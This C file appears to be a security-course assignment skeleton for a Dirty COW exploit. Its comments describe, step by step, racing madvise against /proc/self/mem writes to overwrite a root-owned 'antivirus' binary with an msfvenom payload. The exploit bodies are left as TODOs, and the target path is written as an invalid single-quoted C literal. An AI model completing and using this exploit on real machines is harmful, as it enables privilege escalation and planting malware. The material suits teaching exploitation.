/**
 * Dirtycow exploit
 *
 * You will implement a dirtycow exploit to attack the antivirus software on 
 * the victim's machine. The goal is overwrite the antivirus binary with 
 * malicious payload which will be executed the next time the victim restarts
 * his antivirus program.
 *
 * We are assuming that the victim is using Ubuntu 14.04.5 (64-bit), which is 
 * known to be vulnerable against the dirtycow bug.
 * We are also assuming that the antivirus binary is located at
 * '/usr/bin/antivirus' on the victim's machine.
 * The victim can read and execute this binary, but only the root user can
 * write to it.
 *
 * The main() method contains more details about the exact steps. Please read
 * this first, and then fill out the missing parts as explained in the TODO's.
 */

#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

// This variable is initialized in the main() method
void *map;

/**
* 1. TODO: Generate payload using Metasploit
* - Start a root shell
* - Generate your malicious payload using the 'msfvenom' command (Metasploit).
*   This may take a moment.
* - Example: msfvenom -p linux/x64/exec CMD="echo 'Hello world'" -f elf | xxd -i
* - Copy the generated byte array into 'payload' and set 'payload_length'
*/
unsigned char payload[] = {};
unsigned int payload_length = 0;

/**
* 2. TODO: Implement runmadvise()
* The main() method opens the antivirus binary in READ-ONLY mode and creates a
* mapping into the process' private address space. The reference to this
* mapping is stored in the global variable 'map'.
* The runmadvise() should tell the kernel that this mapping is not needed
* anymore, i.e. that it can be discarded.
*/
void *runmadvise(void *arg)
{
    int i;
    for (i = 0; i < 100000000; i++) {
        // TODO
    }
}

/**
* 3. TODO: Implement procselfmem()
* - '/proc/self/mem' is a pseudo-file, which can be used to access the pages
*   of the process's memory through standard file operations.
* - The goal is to overwrite the antivirus binary with our payload.
* - First, you need to reset the pointer to the mapping such that it points
*   to the start of it. The variable 'map' stores the pointer to the mapping.
* - Next, you need to write the payload to this file.
*/
void *procselfmem(void *arg)
{
    int file = open("/proc/self/mem", O_RDWR);
    int i;
    for (i = 0; i < 100000000; i++) {
        // TODO
    }
}
/*
 * 4. TODO: Implement main()
 * The exploit will work as follows:
 * 1. In main(), the antivirus file should be opened in READ-ONLY
 *    mode. Next, should create a private READ-ONLY mapping, which maps the
 *    antivirus file into the process' address space.
 * 2. Then, you will start two threads that run in parallel:
 *	  One will execute the runmadvise() method, the other one will run
 *	  procselfmem()
 *    The procselfmem() method writes to a copy of the antivirus file.
 *    The runmadvise() method will tell the kernel that this memory mapping is
 *    not needed anymore and that it can be discarded.
 *    Running these methods in parallel and over multiple iterations, results
 *    in a race condition in which procselfmem() does not write to a copy, but
 *    to the underlying antivirus binary!
*/
int main(int argc,char *argv[])
{
    char *target_file = '/usr/bin/antivirus';
    
    // Open the target file in read only mode.
    int file_descriptor = open(target_file, O_RDONLY);
    struct stat file_status;
    fstat(file_descriptor, &file_status);

    // TODO: Create a private, read-only mapping of this file using 'mmap'.
	// This will trigger copy-on-write.
	// Store the pointer returned by 'mmap' in the global variable 'map'.
    map = NULL;
    printf("mmap %zx\n\n", (uintptr_t) map);

    // TODO: Create two threads, one that executes `runmadvise`, another that
    // executes `procselfmem`
    pthread_t thread1, thread2;

    // TODO: Wait for the two threads to finish

    return 0;
}
